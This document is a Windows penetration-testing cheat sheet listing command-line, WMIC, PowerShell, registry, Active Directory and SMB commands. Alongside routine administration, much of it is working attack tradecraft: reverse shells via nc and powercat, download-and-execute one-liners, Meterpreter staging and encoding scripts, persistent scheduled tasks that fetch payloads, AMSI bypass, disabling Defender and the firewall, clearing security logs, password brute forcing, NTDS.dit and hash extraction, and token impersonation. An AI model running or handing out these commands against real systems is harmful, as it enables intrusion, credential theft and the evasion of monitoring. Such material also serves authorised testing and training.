Windows
Versions
NT 3.1
Windows NT 3.1 (All)
NT 3.5
Windows NT 3.5 (All)
NT 3.51
Windows NT 3.51 (All)
NT 4.0
Windows NT 4.0 (All)
NT 5.0
Windows 2000 (All)
NT 5.1
Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
NT 5.2
Windows XP (64-bit, Pro 64-bit) Windows Server 2003 & R2 (Standard, Enterprise)
Windows Home Server
NT 6.0
Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate)
NT 6.1
Windows 7 (Starter, Home, Pro, Enterprise, Ultimate) Windows Server 2008 R2 (Foundation, Standard, Enterprise)
NT 6.2
Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) Windows Phone 8 Windows Server 2012 (Foundation, Essentials, Standard)
Files
Path
Explanation
%SYSTEMROOT%
Usually C:\Windows
%SYSTEMROOT%\System32\drivers\etc\hosts
Static host name to IP mappings (DNS entries)
%SYSTEMROOT%\System32\drivers\etc\networks
Network settings
%SYSTEMROOT%\System32\config\SAM
Usernames and password hashes
%SYSTEMROOT%\repair\SAM
Copy of SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
Backup copy of SAM
%WINDIR%\system32\config\AppEvent.Evt
Application event log
%WINDIR%\system32\config\SecEvent.Evt
Security event log
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
Startup path (all users)
%USERPROFILE%\Start Menu\Programs\Startup\
Startup path (current user)
%SYSTEMROOT%\Prefetch
Prefetch folder (record of executed EXEs)
Startup paths
For Windows NT 6.1, 6.0
# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific user
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
For Windows NT 5.2, 5.1, 5.0
%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
For Windows 9x
%SystemDrive%\WINDOWS\Start Menu\Programs\Startup
For Windows NT 4.0, 3.51, 3.50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
System information commands
Command
Explanation
ver
Operating system version
sc query state= all
Show services
tasklist /svc
Show processes and their services
tasklist /m
Show all processes and loaded DLLs
tasklist /S ip /v
Processes running on a remote host
taskkill /PID pid /F
Forcibly kill a process
systeminfo /S ip /U domain\user /P Pwd
Get system information remotely
reg query \\ip\RegDomain\Key /v VALUE
Query the registry (/s = all values)
reg query HKLM /f password /t REG_SZ /s
Search the registry for passwords
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
WSUS server address
fsutil fsinfo drives
List of drives (needs admin access)
dir /a /s /b c:\*.pdf*
Search for all PDF files
dir /a /b c:\windows\kb*
Search for installed patches
findstr /si password *.txt *.xml *.xls
Search files for passwords
tree /F /A c: > tree.txt
Folder tree of drive C:
reg save HKLM\Security security.hive
Save the Security hive to a file
echo %USERNAME%
Current user
whoami /priv
Current user privileges
net / domain commands
net view /domain
Hosts in the current domain
net view /domain:[MYDOMAIN]
Hosts in [MYDOMAIN]
net user /domain
All users of the current domain
net user user pass /add
Add a user
net localgroup "Administrators" user /add
Add a user to Administrators
net accounts /domain
Domain password policy
net localgroup "Administrators"
List of local admins
net group /domain
List of domain groups
net group "Domain Admins" /domain
List of domain admin users
net group "Domain Controllers" /domain
List of DCs for the current domain
net share
SMB shares
net session | find "\\"
List of active SMB sessions
net user user /ACTIVE:yes /domain
Enable a domain account
net user user "newpassword" /domain
Change a domain user's password
net share share=c:\share /GRANT:Everyone,FULL
Share a folder
Remote commands
tasklist /S ip /v
Processes running on ip
systeminfo /S ip /U domain\user /P Pwd
System information for ip
net share \\ip
Shares on ip
net use \\ip
Connect to ip (IPC session)
net use z: \\ip\share password /user:DOMAIN\user
Map a drive with the specified credentials
reg add \\ip\regkey\value
Add a registry key on ip
sc \\ip create service binpath= C:\Windows\System32\x.exe start= auto
Create a remote service (note the space after binpath= and start=)
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:\windows\temp\nc.exe
Copy a file from ip to the current system via cmd.exe
cmd.exe /c c:\windows\temp\nc.exe ip port -e cmd.exe
Reverse shell
nc.exe -lvvp port
Listen on a specific port
python3 -m http.server port
Start a web server
xcopy /s \\ip\dir C:\local
Copy a folder from ip
shutdown /m \\ip /r /t 0 /f
Restart ip
Network commands
ipconfig /all
IP settings
ipconfig /displaydns
DNS cache
netstat -ano
Show connections
netstat -anop tcp 1
Netstat loop (refresh every second)
netstat -an | findstr LISTENING
Listening ports
route print
Routing table
arp -a
MAC addresses of known hosts (ARP table)
nslookup, set type=any, ls -d domain > results.txt, exit
DNS zone transfer
nslookup -type=SRV _www._tcp.url.com
Domain SRV lookup (ldap, kerberos, sip)
tftp -I ip GET remotefile
File transfer via TFTP
netsh wlan show profiles
Saved wireless network profiles
netsh firewall set opmode disable
Disable the firewall (old syntax)
netsh wlan export profile folder=. key=clear
Export Wi-Fi profiles with plaintext keys
netsh interface ip show interfaces
List interface IDs / MTUs
netsh interface ip set address local static ip nmask gw ID
Set a static IP
netsh interface ip set dns local static ip
Set the DNS server
netsh interface ip set address local dhcp
Set the interface to use DHCP
Functional commands
type file
Show file contents
del path\*.* /a /s /q /f
Delete files in a path
find /I "str" filename
Find a string in a file
command | find /c /v ""
Count lines of command output
at HH:MM file [args] (e.g. at 14:45 cmd /c)
Schedule file execution
runas /user:user "file [args]"
Execute a file as a specific user
shutdown /r /t 0
Restart
sc stop UsoSvc
Stop the UsoSvc service
sc start UsoSvc
Start the UsoSvc service
sc config UsoSvc binpath= "c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe"
Change the executable path of the UsoSvc service
tr -d '\15\32' < win.txt > unix.txt
Strip CR & ^Z (*nix)
makecab file
Compression
wusa.exe /uninstall /kb:###
Uninstall a patch
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true"
Query the event log from the CLI
lusrmgr.msc
Local user manager
services.msc
Services control panel
taskmgr.exe
Task manager
secpol.msc
Security policy manager
eventvwr.msc
Event viewer
Misc. commands
Lock the workstation
rundll32.exe user32.dll,LockWorkStation
Disable Windows Firewall
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
Create a port forward (*needs admin access)
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2
# Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1
Enable cmd
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
PsExec commands
Remote file execution with specific credentials
psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe
Execute a command with a specific hash
psexec /accepteula \\ip -u Domain\user -p Lt1 c:\Program-1
Run a command on the remote system
psexec /accepteula \\ip -s cmd.exe
Terminal services (RDP)
Start RDP
Create regfile.reg with the following lines in it:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
reg import regfile.reg
net start "termservice"
sc config termservice start= auto
net start termservice
--OR--
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Move RDP to port 443 (the terminal service must be restarted)
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
Disable network level authentication and add a firewall exception
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
netsh firewall set service type=remotedesktop mode=enable
Import a task from an XML file
schtasks.exe /create /tn MyTask /xml "C:\MyTask.xml" /f
WMIC commands
wmic [alias] get /?
List of all attributes
wmic [alias] call /?
Callable methods
wmic process list full
Process properties
wmic startup
Startup items
wmic service
Services
wmic ntdomain list
Domain and DC information
wmic qfe
List of all patches
wmic process call create "process_name"
Run a process
wmic process where name="process" call terminate
Kill a process
wmic logicaldisk get description,name
Display logical disks / shares
wmic cpu get DataWidth /format:list
Show whether the system is 32-bit or 64-bit
wmic service where started=true get name, startname
Show running services
WMIC [alias] [where] [clause]
[alias] == process, share, startup, service, nicconfig, useraccount, etc.
[where] == where (name="cmd.exe"), where (parentprocessid!="[pid]"), etc.
[clause] == list [full|brief], get [attrib1, attrib2], call [method], delete
Run a file from an SMB share with specific credentials
wmic /node:targetIP /user:domain\user /password:password process call create "\\smbIP\share\evil.exe"
Uninstall software
wmic product get name /value # Get software names
wmic product where name="XXX" call uninstall /nointeractive
Remote logged-on user
wmic /node:remotecomputer computersystem get username
Show processes in real time
wmic /node:machinename process list brief /every:1
Start RDP
wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
Number of logons per user
wmic netlogin where (name like "%adm%") get numberoflogons
Search services for unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
Volume shadow copy
1. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"
# If any copies already exist then exfil, otherwise create one using the following commands. Check output.txt for any errors
2. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"
3. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.hive 2>&1 > C:\temp\output.txt"
4. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1 > C:\temp\output.txt"
Step by step instructions on room362.com for the step below
5. From Linux, download and run ntdsxtract and libesedb to export hashes or other domain information
a. Additional instructions found under the VSSOWN section
b. ntdsxtract - http://www.ntdsxtract.com
c. libesedb - http://code.google.com/p/libesedb/
PowerShell environment
Command
Description
stop-transcript
Stop recording
get-content file
Display the contents of a file
get-help command -examples
Display command examples
get-command *string*
Search for a cmdlet
get-service
Show services (stop-service, start-service)
get-wmiobject -class win32_service
Show services via WMI
$PSVersionTable
Show PowerShell version
powershell.exe -version 2.0
Run PowerShell 2.0 from version 3.0
get-service | measure-object
Count of returned services
get-psdrive
List PSDrives
get-process | select -expandproperty name
Show process names
get-help * -parameter credential
Cmdlets that accept credentials
get-wmiobject -list *network*
Available network WMI classes
[Net.DNS]::GetHostEntry("ip")
DNS lookup
powershell.exe wget "http://10.10.10.10/nc.exe" -outfile "c:\temp\nc.exe"
Download and save a file
powershell.exe -c "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.10.10:8000/powercat.ps1'); powercat -c 10.10.10.100 -p 4444 -e cmd"
Reverse shell
https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18df36d8e890fefe96a06891dd47d/SimpleHttpServer.ps1
Web server on port 8050
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
Use mimikatz
Import ps1 files
Import-Module .\Invoke-Mimikatz.ps1
Download and save a file
iwr -uri http://10.10.10.10/file -o file.exe
Bypass AMSI
Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1
Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out
Or
https://raw.githubusercontent.com/kmkz/Pentesting/master/AMSI-Bypass.ps1
. .\AMSI-Bypass.ps1
Invoke-AmsiBypass
Disable real-time monitoring
powershell -command Set-MpPreference -DisableRealtimeMonitoring $true
List of all users
$users = New-Object DirectoryServices.DirectorySearcher
$users.Filter = "(&(objectclass=user))"
$users.SearchRoot = ''
$users.FindAll()
List of all domain computers
$computers = New-Object DirectoryServices.DirectorySearcher
$computers.Filter = "(&(objectclass=computer))"
$computers.SearchRoot = ''
$computers.FindAll()
Set DoesNotRequirePreAuth on an account (AS-REP roasting)
Set-ADAccountControl -Identity jorden -DoesNotRequirePreAuth $true
Clear the Security and Application logs (on SVR01)
Get-EventLog -List
Clear-EventLog -LogName Application, Security -ComputerName SVR01
Export the operating system version to a CSV file
Get-WmiObject -Class Win32_OperatingSystem | select -Property * | Export-Csv c:\os.txt
List of running services
Get-Service | Where-Object {$_.Status -eq "Running"}
Permanent share mapping with a PSDrive
New-PSDrive -Persist -PSProvider FileSystem -Root \\1.1.1.1\tools -Name i
Files written since 8/20
Get-ChildItem -Path c:\ -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}
Get a file over HTTP
(New-Object System.Net.WebClient).DownloadFile("url","dest")
TCP port connection scanner
$ports=(#,#,#);$ip="x.x.x.x";foreach ($port in $ports) {try {$socket=New-Object System.Net.Sockets.TCPClient($ip,$port);} catch {}; if ($socket -eq $NULL) {echo $ip":"$port" - Closed";} else {echo $ip":"$port" - Open";$socket=$NULL;}}
Ping with a 500 millisecond timeout
$ping = New-Object System.Net.NetworkInformation.Ping
$ping.Send("ip",500)
Basic authentication prompt
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential("title","message","user","domain")
Run an exe (from cmd.exe) every 4 hours between August 8-11, 2013, during 0800-1700
powershell.exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match '201308(0[8-9]|1[0-1])-(0[8-9]|1[0-7])[0-5][0-9]') {Start-Process -WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400}}while(1)"
Run PowerShell as another user
$pw = ConvertTo-SecureString -String "PASSWORD" -AsPlainText -Force;
$pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "DOMAIN\user", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process file.exe -verb runas}'
Download with PowerShell (iwr)
powershell iwr -UseBasicParsing http://192.168.2.x/SharpHound.exe -OutFile SharpHound.exe
Send email
powershell.exe Send-MailMessage -to "email" -from "email" -subject "Subject" -a "attachment file path" -body "Body" -SmtpServer Target_Email_Server_IP
Enable remote PowerShell access (requires credentials)
net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item wsman:\localhost\client\trustedhosts *'"
at \\ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username
Hostname and IP list for all records of a domain
Get-WmiObject -ComputerName DC -Namespace root\MicrosoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "domainname='DOMAIN'" | select textrepresentation
Download from PowerShell from a specific path
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $source="""https://YOUR_SPECIFIED_IP/file.zip"""; $destination="C:\master.zip"; $http = new-object System.Net.WebClient; $response = $http.DownloadFile($source, $destination);"
Upload with PowerShell
Script will send a file ($filepath) via HTTP to the server ($server) using a POST request.
Must have a web server listening on the port designated in $server
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""http://YOUR_SPECIFIED_IP/folder"""; $filepath="C:\master.zip"; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server,$filepath);"
Using PowerShell to run Meterpreter from memory
Needs Metasploit v4.5+ (msfvenom supports PowerShell)
Use PowerShell (x86) with 32-bit Meterpreter payloads
The encodeMeterpreter.ps1 script can be found below
On the attacking system
1. ./msfvenom -p windows/meterpreter/reverse_https -f psh -a x86 LHOST=1.1.1.1 LPORT=443 > audit.ps1
2. Move audit.ps1 into the same folder as encodeMeterpreter.ps1
3. Launch PowerShell (x86)
4. powershell.exe -executionpolicy bypass encodeMeterpreter.ps1
5. Copy the encoded Meterpreter string
Start the listener on the attacking system
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse_https
4. set LHOST 1.1.1.1
5. set LPORT 443
6. exploit -j
On the target system (run PowerShell (x86))
1. powershell.exe -noexit -encodedCommand <paste encoded Meterpreter string here>
PROFIT
encodeMeterpreter.ps1 [7]
# Get contents of script
$contents = Get-Content audit.ps1
# Compress script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$contents | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 encode stream
$code = [Convert]::ToBase64String($ms.ToArray())
$command = "Invoke-Expression `$(New-Object IO.StreamReader(`$(New-Object IO.Compression.DeflateStream(`$(New-Object IO.MemoryStream(,`$([Convert]::FromBase64String('$code')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
# Invoke-Expression $command
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
# Write to standard out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved. Please see reference [7] for disclaimer
Using PowerShell to start Meterpreter (second method)
On the attack box
1. msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=8080 R | msfencode -t psh -a x86
On the attacking system
1. c:\> powershell
2. PS c:\> $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
3. PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
4. PS c:\> $e = [Convert]::ToBase64String($u)
5. PS c:\> $e
6. Copy the contents of $e
Start the listener on the attacking system
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse_tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j
On the target system (1: download the shellcode, 2: execute)
1. c:\> powershell -noprofile -noninteractive -command "& {$client=new-object System.Net.WebClient; $client.DownloadFile('http://1.1.1.1/shell.txt','c:\windows\temp\shell.txt')}"
2. c:\> powershell -noprofile -noninteractive -noexit -command "& {$cmd=type 'c:\windows\temp\shell.txt';powershell -noprofile -noninteractive -noexit -encodedCommand $cmd}"
PROFIT
Identify vulnerable configurations with PowerUp
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
. .\PowerUp.ps1
Windows registry
Operating system information
HKLM\Software\Microsoft\Windows NT\CurrentVersion
Product name
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v ProductName
Installation date
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate
Registered owner
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner
System root
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v SystemRoot
Time zone information (in minutes from UTC)
HKLM\System\CurrentControlSet\Control\TimeZoneInformation /v ActiveTimeBias
Mapped network drives
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU
Mounted devices
HKLM\System\MountedDevices
USB devices
HKLM\System\CurrentControlSet\Enum\USBStor
Enable IP forwarding
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters - IPEnableRouter = 1
Password keys: LSA secrets can contain VPN, autologon and other passwords
HKEY_LOCAL_MACHINE\Security\Policy\Secrets
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon
Audit policy information
HKLM\Security\Policy\PolAdtEv
Kernel and user services
HKLM\System\CurrentControlSet\Services
Software installed on the system
HKLM\Software
Software installed for the user
HKCU\Software
Recent documents
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Last locations visited by the user
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU & \OpenSaveMRU
Typed URLs
HKCU\Software\Microsoft\Internet Explorer\TypedURLs
MRU lists
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Last registry key used
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKey
Startup paths (Run keys)
HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \RunOnce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \RunOnce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run
Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Get Windows information with dsquery
List of domain users
dsquery user -limit 0
List of domain groups (domain=victim.com)
dsquery group "cn=users,dc=victim,dc=com"
List of domain administrators
dsquery group -name "domain admins" | dsget group -members -expand
List of a user's groups
dsquery user -name bob | dsget user -memberof -expand
Get a user's SAM account name
dsquery user -name bob | dsget user -samid
List of users inactive for the last two weeks
dsquery user -inactive 2
Add a user
dsadd user "CN=Bob,CN=Users,DC=victim,DC=com" -samid bob -pwd bobpass -display "Bob" -pwdneverexpires yes -memberof "CN=Domain Admins,CN=Users,DC=victim,DC=com"
Delete a user
dsrm -subtree -noprompt "CN=Bob,CN=Users,DC=victim,DC=com"
List of domain operating systems
dsquery * "DC=victim,DC=com" -scope subtree -attr "cn" "operatingSystem" "operatingSystemServicePack" -filter "(&(objectclass=computer)(objectcategory=computer)(operatingSystem=Windows*))"
List of site names
dsquery site -o rdn -limit 0
List of all subnets in a site
dsquery subnet -site sitename -o rdn
List of servers in a site
dsquery server -site sitename -o rdn
Get domain servers
dsquery * domainroot -filter "(&(objectCategory=Computer)(objectClass=Computer)(operatingSystem=*Server*))" -limit 0
DC list of the site
dsquery * "CN=Sites,CN=Configuration,DC=forestRootDomain" -filter (objectCategory=Server)
Scripting
In batch files, loop variables must be written with %%, e.g. %%i
Ping sweep
for /L %i in (10,1,254) do @(for /L %x in (10,1,254) do @ping -n 1 -w 100 10.10.%i.%x 2>nul | find "Reply" && echo 10.10.%i.%x >> live.txt)
Loop over the lines of a file
for /F %i in (file) do command
Domain brute forcer
for /F %n in (names.txt) do for /F %p in (pawds.txt) do net use \\DC01\IPC$ /user:domain\%n %p 1>NUL 2>&1 && echo %n:%p && net use /delete \\DC01\IPC$ > NUL
Account lockout (lockout.bat)
@echo Test run:
for /f %%U in (list.txt) do @for /l %%C in (1,1,5) do @echo net use \\WIN-1234\c$ /USER:%%U wrongpass
DHCP exhaustion
for /L %i in (2,1,254) do (netsh interface ip set address local static 1.1.1.%i netmask gw ID & ping 127.0.0.1 -n 1 -w 10000 > nul)
DNS reverse lookup
for /L %i in (100,1,105) do @nslookup 1.1.1.%i | findstr /i /c:"Name" >> dns.txt && echo Server: 1.1.1.%i >> dns.txt
Search all paths for files whose name contains PASS and display the details of each file
forfiles /P c:\temp /s /m *pass* -c "cmd /c echo @isdir @fdate @ftime @relpath @path @fsize"
Malicious domain simulation (for IDS testing)
# Run a packet capture on the attack domain to receive the callout
# domains.txt should contain known malicious domains
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n attack_domain > NUL 2>&1 & ping -n 5 127.0.0.1 > NUL 2>&1)
IE web looper (traffic generator)
for /L %C in (1,1,5000) do @for %U in (www.yahoo.com www.pastebin.com www.paypal.com www.craigslist.org www.google.com) do start /b iexplore %U & ping -n 6 localhost & taskkill /F /IM iexplore.exe
Get permissions of service executables
for /f "tokens=2 delims='='" %a in ('wmic service list full ^| find /i "pathname" ^| find /i /v "system32"') do @echo %a >> c:\windows\temp\3afd4ga.tmp
for /f eol=" delims=" %a in (c:\windows\temp\3afd4ga.tmp) do cmd.exe /c icacls "%a"
Rolling reboot (replace /r with /s to shut down):
for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t 0 /c "Reboot message"
Create a shell using VBS (requires credentials)
# Create a .vbs script with the following
Set shell = wscript.createobject("wscript.shell")
shell.run "runas /user:user " & """" & "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass -nop -c \" & """" & "IEX ((New-Object Net.WebClient).downloadstring('url'))\" & """" & """"
wscript.sleep(100)
shell.Sendkeys "password" & "{ENTER}"
Scheduling tasks
Scheduled task binary paths CANNOT contain spaces because everything after the first space in the path is treated as a command-line argument. Enclose the /TR path parameter in backslash (\) AND quotation marks ("):
... /TR "\"C:\Program Files\file.exe\" -x arg1"
Schedule a task (ST=start time, SD=start date, ED=end date) *needs admin access
SCHTASKS /CREATE /TN TaskName /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD MM/DD/YYYY /ED MM/DD/YYYY /TR "C:\my.exe" /RU DOMAIN\user /RP password
Persistent scheduled tasks [10]
For 64-bit use:
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
# (x86) on user logon
SCHTASKS /CREATE /TN TaskName /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://ip:port/payload''))'" /SC onlogon /RU System
# (x86) on system start
SCHTASKS /CREATE /TN TaskName /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://ip:port/payload''))'" /SC onstart /RU System
# (x86) on user idle (30 minutes)
SCHTASKS /CREATE /TN TaskName /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://ip:port/payload''))'" /SC onidle /i 30
Working with SMB
Log in as a specific user
smbclient -L 10.10.10.10 -U tlevel
Log in without a password
smbclient -N -L 10.10.10.10
Change password
smbpasswd -r 10.10.10.10 -U tlevel
Show shares
smbclient -L 10.10.10.10
Open the specified share
smbclient //10.10.10.10/forensic
Log in to the shell
smbclient //10.10.10.10/profiles$
Get users along with password hashes
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py 10.10.10.10L -usersfile
Guess SMB passwords
with metasploit
msf5 > use auxiliary/scanner/smb/smb_login
set PASS_FILE wordlist
set USER_FILE users.txt
set RHOSTS 10.10.10.10
run
with medusa
medusa -h 10.10.10.10 -U users.txt -P wordlist -M smbnt
rpcclient commands
Connect to the system
rpcclient 10.10.10.10 -U support
Show user information
queryuser support
Show users
enumdomusers
Show privileges
enumprivs
Change a user's password (info level 23)
setuserinfo2 audit2020 23 'redteam'
Show printers
enumprinters
NTLM extraction from an ntds.dit file
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -outputfile nt-hash
Gather information using SharpHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
.\SharpHound.exe
or
SharpHound.exe -c All --zipfilename output.zip
Gather information about SQL Server
https://github.com/NetSPI/PowerUpSQL/blob/master/PowerUpSQL.ps1
. .\PowerUpSQL.ps1
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Obtain AS-REP roast hashes
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
.\Rubeus.exe asreproast
List of live IPs without using nmap
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i is up.
Or
https://github.com/sperner/PowerShell/blob/master/PortScan.ps1
.\PortScan.ps1
.\PortScan.ps1 10.10.10.10 1 10000
Service identification with Test-WSMan
PS> Test-WSMan -ComputerName <COMPUTERNAME> -Port 6666
Enumerate OUs
Get-NetOU -Verbose
Retrieve users in the "ICS" OU
Get-DomainUser -SearchBase "LDAP://OU=ICS,DC=nuclear,DC=site" -Verbose
SharpHound collection
SharpHound.exe --CollectionMethod all
Impersonate the token of nuclear\vdadmin (in a psexec session)
incognito.exe list_tokens -u
incognito.exe execute -c "NUCLEAR\vdadmin" C:\users\public\binary.exe